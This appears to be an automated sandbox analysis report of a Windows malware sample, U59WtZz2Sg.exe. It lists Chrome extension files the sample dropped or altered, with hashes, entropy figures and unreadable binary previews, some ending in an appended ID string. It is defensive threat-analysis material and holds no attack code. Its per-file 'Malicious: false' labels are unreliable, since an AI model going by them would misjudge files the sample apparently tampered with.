SSDEEP:	48:nXXpQiWVevQdi47Gcg57d3bkSWmA7nBDL4D:JNw4QJycgtdLkSWZ7Zk
MD5:	F1213D5B6F088AD74D9EC4E601B67CF7
SHA1:	75C2514A95DE6A1448AE88BC73F59582A5B8459C
SHA-256:	D994223C66C6E10C4E716F89B3F6C407120E63C3DE2C3DD5C8366BEB9D6680AC
SHA-512:	5A8FA04B79D7397B3D912F8EA420E8AA8EBC974F443BDF7783EEAD42D7FAC525369A9E66B214F41D5DB11C176FC60B0CE5FF5E1036ECF13916ED1EFFE56670B0
Malicious:	false
Preview:	.f.5.{[.iyX.Nz.!.p1n a=.....Q9..s........o......l...F..f...^4....K\|..YfQ..KG~fA..-+R.Q?i..8q.$...;.b.......fS.....M.s....b...Un....M.. .d....]....0c..dR.\|^T...Y..W_....@.#.75.'.A..\.qO)6....r..l..5.tn.z...R..87.6.......4L.. ...x.)....\.....W.1..f"$......F.Gy1p.<.....&.\|({.XiH...v..gi%kI....7.....u..V5j.v..+..pz......`P.@.3e.8I.i...%...V...`..o(.........g=....?..pN.tA.}.......e..%.%.2....y..X....(..^./S^n.h.3...E{w..(.O.[#.\|M...QZO....b]NO..b,6...n....>B.>?.C.\|:..P.z.......~\|.....c......r'h)..R.%Qm.:.U..._T.\x..,......L....(._C..:Lt.P.....v.&!.c.\|...n./&{2........;F..)w...L.m.E8$@......6...^......U=.$....V./.2...>.~...]..U.."..e30Hd.[f.3..n...\WCG$<<Fi.e..rU..V.}D.(....g....4'FBaC6..I_U{)T.E.k.....c..RT.N.. ..!..9.%.O.-.t.._=wmp.x.]#.q.....s._...YF....E...@.X.........D..:...T...r.2'cL.P..L9![.sG.)^.Tm.J^.uB.n:...$......q.......\h......{.%o.u.0...9OU........Y+oX.....5.'..s}.L..p;.....M.....`*.."....?..{.@r.5Vq..C.B.....]..a,n.xF3e

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	653
Entropy (8bit):	7.644608849408246
Encrypted:	false
SSDEEP:	12:Xs+UhusMCfmKHNZBGx5M4i+zmBhZSI75VovjAkf1Lv1AoLClUtcii9a:8+WusZJo5MLQCTSjJf1xAwjbD
MD5:	D65F1820AD39DCBA687424470CD84301
SHA1:	2BC1FC5D648B896E438364A3F9A14018C3969B19
SHA-256:	6E619DC3852E8EF8D4C15A3AE4530B98760878AD11866500116F33003212AC15
SHA-512:	A29A1B4413FF526CF4E2B623B4729D851370E69174009D1E3F0C697B084C9FEB859C647778BFCE79641E22780F557D1BEBCAD13E1733E3A8E774BD13E1673ECD
Malicious:	false
Preview:	2020/..X...3}2.....{.}..o.........r].]H......L...#J#V.v+.=..o....h........H....K y.qS.l..M.x...g.....N..OHs`.?....Z.6H5.....`u....../#J.@.~E..~.......Pw>..Y...1:D.....,ysT.Un..\'..64t..P..58.+H#....q..'s..........~b..."......"%..:....x-....-X[.C...\|>..lPN!k#..HW...j.>>Vt..x@........f....W...*..........qZ.#..& .@......W<...g....SP.......a/g....F.R.5.....w;..0.X..Di.t5.. .K.`...7vr7.L.]7.C.Z}.\|....w.{.e..va.KJ..Q[i...zEt..]L... .....ph..#F3f...]..?..@i.....`........UJ......#.%B.K.J...eR..p.`.....i.P..L../.-..d17.Z.{....z..../...f....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\128.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5316
Entropy (8bit):	7.967877148381009
Encrypted:	false
SSDEEP:	96:vmao6sR2eeK2FS4i6GW7yHa0zq0bxdtnVBRSTY2uyxoOI7PvbRljaL+enK8O68r:+a3P//4W78bd5VfZG34Xbn0hHOX
MD5:	4A96798DD9BBFDD639D955F4915C05E2
SHA1:	D2A036F6347553B077D6877DA7428E368D7A982C
SHA-256:	B30F551FDBAF75EAD8DA9D5E8D389B38013A20F33C27E0D20D4D6610FCAA9CBF
SHA-512:	EA5C498BAC2EE80BD442FC566B4929F55F2FE2F410D7817451690930E8BD3C4D6741DD447C53628DE932FA37A77A2A4476AC1C3B39765894E6B620A484CFBEE1
Malicious:	false
Preview:	.PNG..........X;2.4[$..B....H+...T..w....K_...-..C?..Y....(..Y/..(Z.!c.]a'..I...7....)..Y.An......@{bV..I..vt.dh.vL6l..`.....W....&..).......,.....)W.'.#...[(.'.<x..'}.......J...$}H.....wS.h...H.......5.Kg.........u2.K.rV-.....t/.qj.y`.X.u.........'...\..h.......Hv.<.0MMA..<.e...]...`.G.k.R..W<@..c..&..Qs.....2......V....*...7M.]..9.....B...nh.T...3(.....W.....R........'LY..f...C...Y6. 7...o....h....t=..`..H..[..h...,...g.R.M..$y;..i..^.8.o5.-...%Cv. I..AI....x\.-P.}..(3....NY.!.......7:.z.2._....2....:..N..V.Q..+`......./....v..].....-.e..'3.9=@.K.p.f.\|........s.....,.\.f.{.F..@..T.....k.b.'..(.....L.30.C..2&.=..`if-.E..P%.....S.m..B..?.Kc1..r.........e......6..iI..w.'....k.+F.4P.S....{R&J3.j.J.C.7d^...Mh5.kQ6.z.O.....)D....Q\|.-.}...X......K.p2Q?.....U..1..E....).[k!./G..[.S.....v...p.>..-..y.V..l!a..!x..m..2`K.....w.:.G[../.$l> C].aI-...\..OE...D...6......q.g.._.,......``p.k............q...%N...]..f..e....D&..P...._B.m..-U

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_metadata\computed_hashes.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3964
Entropy (8bit):	7.954286272790977
Encrypted:	false
SSDEEP:	96:rhJZl4rbCSFaADUEAGi/uzDhzQ2rCxr2tbdwxCInMkjf8xPJ:rh3l/SFa6iuDFQXr2tbdwxCInMkjaPJ
MD5:	0ACD1E2A3547D7B273F4DB56EFBB6769
SHA1:	6B609DA529C0891043D67310342B1403BAD94703
SHA-256:	899B7B18ED7EBB101C903E200B8F85686718A1C843B33A5A998F73539494CC7A
SHA-512:	C12228DA6327E29ECB585879C594263466540768C3848CEA77605F4DE8E635D906F98DAF0137CF7807FEFC303D91BA705B7FA8FFD52FCE2BE4A8A6C4C98DDFFA
Malicious:	false
Preview:	{"fil...w....V....w^..~E0@\._..jD..0n.oq......7.X.`%4..5cj{rg(C.`IN@......%we=D..IB.u...\|c.....I....)!....6.Us,q.."...:s....0..niN...J=:...O......f..ADe..nr..G+...~_4.t.d....5}.">.x/TK..7..L0:Q....v........s..XO8...}....5`..<..i.R.....pp..g.yV...l.....f...l..i...-....Nw.O..O..kc....r[z.....$v.J.bo{&..!b..3U....(+.M.L>$...).....B2.,.......d....yK.7...:.)F.q]tp..2r.Y@.....!L...2..M..#.tS.4..}..W3?m.3)4...`...>v].. .6.s......%..w)$;^.......9..!H...QK..Q..._ D..p.#2.emK.P..x.q.F...Y.m/.K.`.M.1.[.$..b............h6...3Y...@1Gl...C.f..qJ.W}8.yA.&.q(C...Yvw.Z.=..z.O....TR.>Rx..L{'Y..T....>..1=..c....\.2.j~V..\$.ND.D....U#./....Y.....Kk......U....e)}.e^..]..(.W.D>j:.9_b.?.JlLcJ.d..s./.5#..g.....A...\|.ql......@./r...Vm....=..p...._..l.,...L...J...=......<>......lz$.b.'SB.G..JV.1FCo6.c.s.K.{q\d0g..FBt..a&k.*..q...s.R....-....'...........w.c...g.V&-..D..;.u!.XKt_......k-..G.......k..==..z?..#...a....t.^.H.. .Q....X.....E.&.6.S.....l.c.l{.w)+.u.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_metadata\verified_contents.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.989184679597943
Encrypted:	false
SSDEEP:	384:Zd8p+3ONR/rHcOcEUhoI/5wX2YjNV0nzuorO/4D35/z:Z+A3ONyphoI/5q2Isy0LLdz
MD5:	4BFAFE624D63B0BFF54B9B45D352E7DD
SHA1:	B57E0CB8EDC20E3E6CB3DDC2A26057BEE8F6C80F
SHA-256:	50D4B8144AE4398295E2D33CD48BAD675500F24B220BF7E73BBDEC5CD2860C52
SHA-512:	78DBACF8B3555862D139260458EAFD87FAFCAA91661913C7E0265C32321650B24FD00D96C7DB8D28DE5145ECEE7200C4C34B90EFD5E5DB9C0A1628288B1A0D5A
Malicious:	false
Preview:	[{"de.Y.......yn.2.j......Y.E!W..KOv.`4G.k...TH.[.?3..:...f....A;...."....S..+......}..r....(.\|.V........A\..J[Gg......k..~....a.^.....@...=.S,....>..&.....\|\|<.It..OG.D1....FUSwn..i.9....&bL..F.D..A3....?.........AB...i..QP.... ~2x].(%..,~Y.....B......M..T..;8Z8..(J....P.x..K(@.P\|%..[...M({fgn.K..K...Fi4..Cq.}..3...W......O L.....s.+..wB.i.m..BN..KXe]....%..:.#.....I[z.5...f..".....I!.L........E...y.T,..a..Z..........^..............A$..}...d..M.:Z./.=....TL...rO. D..kA@.p..lMN.^\.^.....(..Qg.UE6.D^.QmYr.M.M..o1. Bm%gI.-....t...f0.....E..i...^N..X...;F....^.YA...E..../.>..N.:^5...%[......n..og.G..C.~B.uE.E$Y%==f....I...{...=.....l......S...oJ...e.F.d~.z.P..$.W...b........$..Os...t.7....!.m....!.k..P..OI.Z.)mK...n....P..O.Pp.......)...HF7-....)}..&...C.......U..\b..=.J..R.HT.@T..c..v..LB.Gp._JK...Y...O..oB[.#".(=.d.. D...^..nq... .i...T...Va........a.;.8..<.....JF ...z-.]b...z....{..W+vy..]..&d?....,..hU~...6C.R2..p.m.!nO..>aFcJ .r..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\dasherSettingSchema.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	7.842147316775836
Encrypted:	false
SSDEEP:	24:SwbFGedlKOk37Kq0HdJaRY+HvzXfGFaPXVLlFgRZG0SHjbD:Sw5PzkLKRaRYAOFa/boZG0+D
MD5:	6168B1540E442F82CD50A399E66832ED
SHA1:	6A2FFF698F8E47CD32E0E00CC41FC99F50C0108A
SHA-256:	B92AE5C1BBFF385F938BDDD5243A1AD80084553BD8F59B159960AF6C4B885A16
SHA-512:	E2297946DE05098E1DBD942FF48E1B8E91F94DE8B162C497B26103C1CCDC89F387DF6C3C6C4B843632EE27E60ED42E799B966F3E2E317E7CA7319C958E94A635
Malicious:	false
Preview:	{. "...'....\.1....0.Tqag.[. 0..s2.1..CBw/.p.dE.5...J.&..:?!..K-...?09...&.`..7'.o .t..)..^.<...y.i5\&.{..F..?(V$.x".{x.-%..... ..z-._}.<..Y.yC.J.x.~.t.k.2>....~..\|.I[)k`A.}K...Xh...y.cU%vs..=b..Q........K...Zy.......}.T.#.z.p.,.v.'..Q?hli...;...^lWQ...(.1..j...)....r].....V:...7....]..S...y#.A.E.....8e^.(..Z.........@'..R...7.H..s.(C.`..>e.b.+h.o..Y......w.g9"X;`#.]..Gb....t..{-..K..L..\...s.9......A....LP..w.!.f...w...qe...P.]..7...k.G....6w].R'b...:k..G...k.d..UV...,.j..#U9.b......h.C.6.x..5.Q.F.=,.../`;K..m.L....?..U.#.B.......c..8h.=....U....r....\|...........5W......2<.V5..c.[.. .B..5..S.v.x3..9i<h.T^a7...S`.....+oTx(.k.G.V.bG..(..I2..d....w...N.B.......8..-.........z,.I.`u......j..N.)...:....$$..v.Q...}.$.L...u.Z.P.-..?.(..b..b..C:..m."..K.:~.$E.q.5.5n..w..z~..}XC-w....mJ..6..h}..m....Z.Hk.o...+f..U.......s.P....?E...W..J.......2..v..^...wX.....k.&.Xi..O..I..T...',..D[%...7O.W_....J}...J\|..S9..5....cXn3..........-e.P.nR..(@n.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\eventpage_bin_prod.js

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	68133
Entropy (8bit):	7.997517400133588
Encrypted:	true
SSDEEP:	1536:oT1F+fopSNCMnLDmHhYVtaplkK4zOjPQHHDJzabOpXSfGSW:QDQcM2WGkaPMzaI1
MD5:	E27A2F1357B342B33F51DACA171646CE
SHA1:	FACED8EF8226E9A1D8F0F671E80175064D42FA93
SHA-256:	E26533D0A3457140D9C10DE74F8757A9FF6BA17B56F350613AE8DD867A62D0CE
SHA-512:	8A5A893D62758F1714959D1A8F2DC7547643BC4CABC51C915F7676AFAC0D1DA5E1C507B06B5DD414019C52C4D3770E6BDB6314BCEF803AAADD9C185867E802AC
Malicious:	true
Preview:	/.. ......Y.[.L/!....6-.Y..C..e..rzc"..1...M..3...4=..+w]id]J..../.W.c...W3...#..i....#....).2b..o...9m.._.\|P[..g.6..W.?.w...!..e[.RA.z.3.....>..?b..P..jQw....._$R(.~......~...a....-...E.'..p....2".$-.a>[.`.E.. .dM..E..vB...X...B.........Y..h.w......Oc..{r.@.z.@..a.+Q...r'.J......0[.w9$.\|...[./z...>....#m`..a.......k_o]!@.Q@....+.7G...9...5..9.[.1&1.?qB^}.R.9v\....:w.......q.!..s.L{..]..24.e...U..-..yk.J+...S8...:[oj..z\|..08..]gy.D./...'"g.f....}.O.%..{.;8..0......N....1........$&.xV...j}..T#t.R.)..:G.mf.PBtUM.T..cdU.. ..g...........fR.O.HNP.ncQ...3t).......S...$..3...n\:..F.Ei._.5.N.E]i(.xw.......Nt....x.7P.p2..E.Z.A....Fi.......c.$V.N..h..a....#...........#..V.....=...C.i'.FL.RL1{...^lE..^.^.F!2,.7............Ri.c.....HQ...K..(T.UH.OJ5........X..^..G.Nb/.?aH.)...)b..?.>3Go]..)...r..}..W....b.i..]...K........a...\pX........vE.L...G...Z.KJ.\......x%.^.Y..@7X..FK-Xo.I....5..m..G..)0."O;.:..g..kI.#CvH....P..M..V.k$...$...as.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\manifest.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1854
Entropy (8bit):	7.889303549505147
Encrypted:	false
SSDEEP:	48:QH7Whxm1zIIScDL3lKYzWfz2pP/IIIIMZO1kTdGc32u4FpD:S2x7PcDL3QYzWfz2dQfOSGc31S
MD5:	567AC0DA19B1A4D6E7DB7BAF2CBCA628
SHA1:	68BB1A58F78E57BEA156405F6EA1DFCD87EFB56C
SHA-256:	98AE1F3665CFAE05FD91467371BB2EAEBD4823C553298C74F14C8012F39625AA
SHA-512:	873C0946D8160A97E68EA047425F31FA609C970E4DB576983D56A6890E6224096DEEE108ECF16D0FD26CA184C31ECD18811A626A864D6A6EF70E8F30D042B600
Malicious:	false
Preview:	{.. ....C.z._.e).}Q._.w.\|..i..\|.3....\q.<.Ho.[y.q.c.:....i.I;yV.....i.........;U....:...2+.7..!....._b_CQ.i....9m....[..sJ...V....h.<..z..P.aV.7...Y..c..+...m...a.H.p..H..M5...S..+^.Dhr....RJL2.W.s...v..]Tjz.....qo..W...o.u..9....0@~....f....SoZ.n...5..2RHB...'.h.$)i6Pn..'...,~..;...b....-...[5..x\._.....X<]z...>[.V.....AHbix....dU.L.B..Ja.........N._N....l...4.....8..F.Qn.X.r..y0....EI...C....I.HE."..^.......8...~.#./.MB:?D..t...FO..G.......ye..,.....ihy}$".N.............D.....'...k.Y./iK.}AM...=.\|VZ.z...u..n(.0.....U..&.....:..i.$YZJ-..n.?..e.\|......,..:n..3U.i.C....MR.^.@...E......&p.W.....Qw.,d...C\\..NS3e.!..;..K.u4n...L..ng\f...\|e@..U'...$...nv.yG.A7W^Y@].A-..-.......q......I\8...R..n.)vI...z..y.f....S.nn..Yt......".{.1...ZU....^..#e....kd..V.v.W.._&.'.. ..../.EU......C...1...m.=.w.6.F.).XJ.DN.v.@Y]....y..5;.N...].+..g~y...`zI}&nn..3.....8.U.^0.....k.cx.a.9\7...'F..&x...4t.{...K?.nb.R.h..v&}..........C8=.gx} ......).EQ..OC

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\page_embed_script.js

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	581
Entropy (8bit):	7.584789203489974
Encrypted:	false
SSDEEP:	12:22VLGIBoOmT80XF3On0ovUfB2VCEoAylrdifcMtcii9a:22VLVo7cn0yUfBA5GybD
MD5:	EB94EBC7F5E1EAA42B45C8181C800BC5
SHA1:	B4AC8B1B9A11A99E42FC93367792EFE5CB11D5E2
SHA-256:	0AEC796A20AFE074AD5538FA3087961B9F337F5B4601124C252B9759B29CB78D
SHA-512:	213DEB98235EDE3B1BF11AD37299AD14270BD9263D9727F47E70D47D6C1FB6CF55FA0C729F01435E856D398C7C4C75AB154F4FF8186EEBC13D901C23E5565A78
Malicious:	false
Preview:	(func...X...J........VT.x......4.`...7IOsm..W.$K.1.qP.....O......nJ]b3j. .....I...hJ.*._...O=...R.r.j^K.=..7b....D f.....5...PO.6.......v...i_.G...-..V}......C.u.!.......F.a..[.O...\|%.u.<..pS.xhDP.P..2......y....$.J.........j...ie.........1>5{W^.r.T..>P..`...)./.D..."X....m...KMn.0>H.@(".o...i..j..R;..9.'........3;6;.8..9.k...h.k..4. .6u.?Ow..2..+.ok.T..y..B}..\|...kPA.\|....$mwR....{..'.LcM. ..T....l..D....TB`..0...}%..4.xa..-.V..!!...B..?.jiL..N.Wm.9.8}.3...r?.Q\|.<&..'.xh...kK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_metadata\computed_hashes.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	18272
Entropy (8bit):	7.988372191864928
Encrypted:	false
SSDEEP:	384:ouf3pF9XuvI/KNyPkzxWXjTouoZxE6Wq/ncGIupNw/l:ouhF9XC7OTouoDM+2YE
MD5:	B6677C22EADBEB8CFA11F8F555030DBB
SHA1:	45000524D0E332CAF55293A49466B0C4BAD48E24
SHA-256:	D1C4AA2BE081C3B607AFB11F663F8FA8B2C036D0EE850B4E1C1397A348D895A5
SHA-512:	DA4C0ECF78359C3BB99FB882697954907DE715517A5A710762E7EF6BF0434B20AA75BCA6097FC9BA08DEE7471ED543D1FDFDA314AA3DE4F6B92C2ABE2F63B3FE
Malicious:	false
Preview:	{"fil...H....vt..,........R..##q..B.%..5...8...Ti2.......>At.[..V.B.^"p.\...m.T..l.m....g.Wjn.X..)..q`.D...6.t.c.~t.cP.B.....`.[...cNzSO.3Bx...G..BB`4....>&.y.o.O..?3.A.+v........2..".L....3Y..Vi..z.D.;.I.K..6...2+.....\.[5...U.]...L.t<.+....u..H.....X...u.4h.X.C.(...F..^......e3nX.e.#e..1.......N.%.t0.....6....iM..'Q..&....v.IXzr.{..Nn%.6....`y.O.: .k......x..4.{,zc2..F...P....#.k..t..6.Y...."...TU.]].;.....(..%....I]cX.....L.<G...I........`.........g.....%..k.D\|;kw.....}.U_...B...N.U..`.9....dR]8. .._.V@^w....ZK.j.}F8.onAF.?...,)..$.....u.....JH....-.a.wQ.Ry.?.6~v.:..#"9LI...@,.Z.z......$b.O^CruA<..8l.....aZ=.&....KDI.cW....p..C.}.HO...c..........6.s+K......Y8.t.DL.g.......3.y@.....vGl.c,..9.....[+:d....Ob..q.A...........X.l...r4......:.-..I.}.1..L....K.\|m%>9t..z...K5../...S1M..h...d.....R....J..{o.ni..=."..A>.ik..g1gmV.P.{.V#\.[.B..c..-!......i..K..RA..c.Z..\.L08...........aW.wT..lz.+e..a.x..J...O...&.....>.2..w8...o..1.>.}...9

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_metadata\verified_contents.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	8114
Entropy (8bit):	7.980653056438372
Encrypted:	false
SSDEEP:	192:vVTVHpx/YkZEIDcGq9MSTG8Sasxs6goSiuO52WlWMWU5lFw7xDthxV:vV5HpxhZjhqNGqKs6xWWN9lFw9Dtd
MD5:	A30BCD80EC177489F7A48C31B47E0C86
SHA1:	F2F77813542B3A7745F4683519804A99B10591D4
SHA-256:	F05AF7E7440C7CFFE55B8526D4857570DA1699EBEE377D5D908C47EBC59990DC
SHA-512:	7A218632B7BF5AC1828A4DBB986CA5B611C4AE2CC54CAA7C2C5ABA2FF03BD42257F5F3F50ABB2B31BA2553E7A2942E40BA95B24DBCCD486E2ABA33FC32FE6573
Malicious:	false
Preview:	[{"de-..4...f%.O.E.C.i......s_m..~..vl?...0.$............-......".F..."...y..~.T..V...E..]..o....3}+.t...-(.-e..e...gn..!.`&.B."(... \|wB..5..)Qc.f.k^?EwF...0.z.J...^..T ..O..vH....r.6..`..Ji.u.....S.....H.Bb..Yg..q~o.s.f.Z[.1.n...&."......+..4.`AX7~.M\|....a.7../......}E...,#3.xe(...U+....V...E..S...K...].5!oh..j..........r.T...7m..vD/.Y........c.y.../.Nu.V..6..$.]P....b.`Ux1w.e..%...0V.]Q..<U....t4D...0.z../..ijZ+....}.y..R...R_...yR._.th....RF...W22...>..?&.}...TD..........4#)>....uN.d_v.74o....T."+.cqh.+....G.;..!..i"....Y{...`..('k...b7..,'.\|...C..j....E..B.k&....-A5..7...r.._a........v..&....-..ma.'....2K..c.r5..;=V.s...'....6..[j....w.&.}.......C,.~..H...p~..D.}g....WA#\8..^.w...........U..S..$..$.D6..........$...v..E.eoi..$.g.;C...=.YI.....5.......C)_.I'..@@n..........{:.\&..}.m..$.....T.1Z.z..h.....1#.*.k..w...E_.&I...M.....!.P7..s........?..&.-"@.1(r B&.j[...-...}......J1..!L....R..\lT.fzLh...v.....O.....o.h1.....

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\craw_background.js

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1125962
Entropy (8bit):	5.998288747102356
Encrypted:	false
SSDEEP:	6144:WyDmKqbt+4vu6sX/O8jXZrp03tPgAhcDnR5eTjnZV4VGLPEz1019sZMbPzWab3/v:nkb3w/fg3OAhcl5eTjIGb
MD5:	6D0D31423A01A0DD34981ECDF29D16C3
SHA1:	F213E10A62FFA68E9168E71318270D95B6303B95
SHA-256:	3D1B4B0E0CA0B6387B27C499BAFBBD7525526CDDDACB41B6BB49084D13199241
SHA-512:	4C1ED1F248BD5F991B0083C4E736DB204BF55515C60837244E01436F4B94B1069F3CD606B5EF19D0B4E429759136C2563FCD3ACB56687BBBB602A6FE66C73D62
Malicious:	false
Preview:	var d.c..j.f....]g.N<S:M.N.S.....2..Z.J.:.v.....(v...>\B...../....,iy!!.S..0.O.....{.."N..vy@..(...D.f.Cs;......M...t^y.......Fg..i.\.7...~A.-.P.i....k.A2Y..NX.q.!.....Z....h..k..T.r1U.:..cs9+..4:8A....e..j[.(..t...............x.].S.]9.>.!..p3;().sO#m...&.y#&....44rO....\|.....%..6....m..@.....uT._7.<..y+.{?&..N..D...t..>2.URK.......~.....s...G..q..a.S/."s....^...9.dr.f....p.#.r.{=.....I:.o.u\|.Q.E..w}#.0..v..x.....P.N../..V.0.T.."...i.P...Y..[.}.2.gb.vt..]..a...; ....V.<.I.N_/j........-..f.........N...`6.D`.\.. {R..l[AK/<..{.Y.q..m.\..W..o)Q..F.&....)...........D'.u.....G.)%.).%\.,..QZ....TQ..+V....."..0...."..I.1M.u.\|...E..>.SS...R(...x'........l......L{!.....j$..!..v.X=`.w.I..My.{y.t..P......vBLLI...G.Zf.....0E.....( ?{.....=#....8P..=...vS..:.S..._..fNwoN"3..>.Z`_........?...{..2.../....Gi.............g...Y\|.."F.........a\|^..<.3.o.+.U.t[..q..q[.a.g..a...Z...*Ng.1.?.H...-4.u.WWg.U.......)P0}..X..FU.#.E7.7..,.+..8...}..3.H.y.o.Yd..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\craw_window.js

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	266127
Entropy (8bit):	7.47589802519111
Encrypted:	false
SSDEEP:	6144:6/PR8t+E2di5xZh8/i+jNxcINsOVmhYw0mHno:6XiVmcW6yZ57w0J
MD5:	5407256EB12516505B740CFBE11C97B9
SHA1:	F5104DAE23F1AB5CF1B4709C9BB1B049C6F6A9A4
SHA-256:	F1E06E47E0BC6270AFA0530CBA6F6C2C1507828066C2FAE30BF33E006AF755AB
SHA-512:	54B31133A52376A85B781FD52C5050492CA5588226251DE35FBAA716C997042ED711B7D64C826FB63CEF084BA736FB43C4A747AF03A32DC3EF695B222837C54C
Malicious:	false
Preview:	var a.=%>C.TZo.!......h..3=....Ap....q.K.u......vkl/......oa.n.=....9+].>Z'..&.......p...}. .E.......t.....ND.T.....[.A..........C.L!...LVZ...Hj..}...~..)r."z...X..u.].......A...zg.i....s .........7.`Y..3\|.....3...^...b..G..Z.i\...p..0Fk#...c%...Wca...+...[.0iJw..E.f.t.r...]^.rN....U.VX.@..C..y..(..YUO.k.Z..y..\|.uW....am.V.MAQ.D..h#.....#.!v .B...c.....zt.h@.i1.....S....Z.=CN:.&.%AL...N.4..8.]}........=......U..'.f.<bR.+#....p.U......./.x.......y.i(w..I'....;..`.<H......'..>..[^.{_..zW<.9.<....}1...9..M..=N@1......@...j.q...%.H......i.[u2#..W..[.=.!...Y..T....a......:.{.w..l.l7.#..,=)..U.#.4.....E^..h..n\|BJ.7.a.....m.5oV.ws..8..naW...oau...k...m....\H....lh.@.Z.Q.=I.I..>./."...rU...6.^.]..>.5Ti..`.0..[.\|#....=.:*Ym0...=.Z.o7[H..B.G...D..r..4%.>".....f.=uI-...O.Z7..?...!#.o...Q..8V...c...$..%!.l.... ..R..M..g...1.d........ft.........QM......m?...EM.M..}.I......l=.g..e0+O.y3.)..,....6n$`./....2(@.#.H..3#..3+,.^...Pv....Ye........w.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\craw_window.css

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2075
Entropy (8bit):	7.902006258175799
Encrypted:	false
SSDEEP:	48:JuMgGhqPhAOpiVXDcDQTeit6or3TWvlzsfq9HhkwD:Ju+sPCOScQTpJjO08Ss
MD5:	9DB2C16697AD65C8E052C76977EF3C49
SHA1:	80D89AAD59A259E57A125A9A880A1D077E26C74C
SHA-256:	746D2D4467BD945F6267B80C735453E707CE743436FED82C191FDC6D24E4B242
SHA-512:	700C36ED89492DA9B26E364875E0F26BEEB8E07DF2525ED797BF6693931EBDF94CB34650F7D3AB0B738984E7F51A2699F899DC4E5EA9BDF3D92E7BE4AF397F9B
Malicious:	false
Preview:	html,.+....\.Gj.]..nB..W\.Iq..dc....x].KHZ...).W&\\>e...&.f..F..Pr.....T.......Y...@.3.;...S.>&u.0.C2:......}.V9..7..u...gA.........P.........bc16M.X.'....`7...mx.l...]..,.v[....{.....g?.l.r.(;.F......a..V.)..OP.`#..(9.."..N........t.D>..33.l0..:u).B..v..w%w...O.g.U..n..U...9m-.!.ASH5x......2..'.N'z..u.x.r..b.Px.t.......U...z....]..Re.C..{{.,..-.7..%?...w!z8k..e...x..'.....Ut7......0:...g.....5.J...m.1..a.9.k..&0 ..&....].o.\|..^.E.$..!W.\i_........<>..%f...3.4.d4.....v..^9....!...-=.KT$......c.?zn9{TG.....).MQ..V>........s.h!..k5<..q..\.E.....v.9'......m..F.%;...4#...=....c(.s..E..fm..1..r\|JYF.....T.TdF.C..}....@.s/.....4b...Lu.a.....26D.74.....h.GHT..0.z%.o+#9..X.......~....R(R....].yU.a..an.=.....L\.U....>...w.../h%...b.zs....V../....k...Se..S...T..!j..d0..\r.'J.\7.S......F(}..yl6..h..].aj.#{. ..l-.....=.N..:\|.t.....[.C.b.....zO....S....;.w..tz....-)-8..7..~...V........8-.-..y~%..K.SY....D..... `.......d....}pG..Hh./.s.N.(....i...n...M..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\craw_window.html

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1144
Entropy (8bit):	7.820022209000287
Encrypted:	false
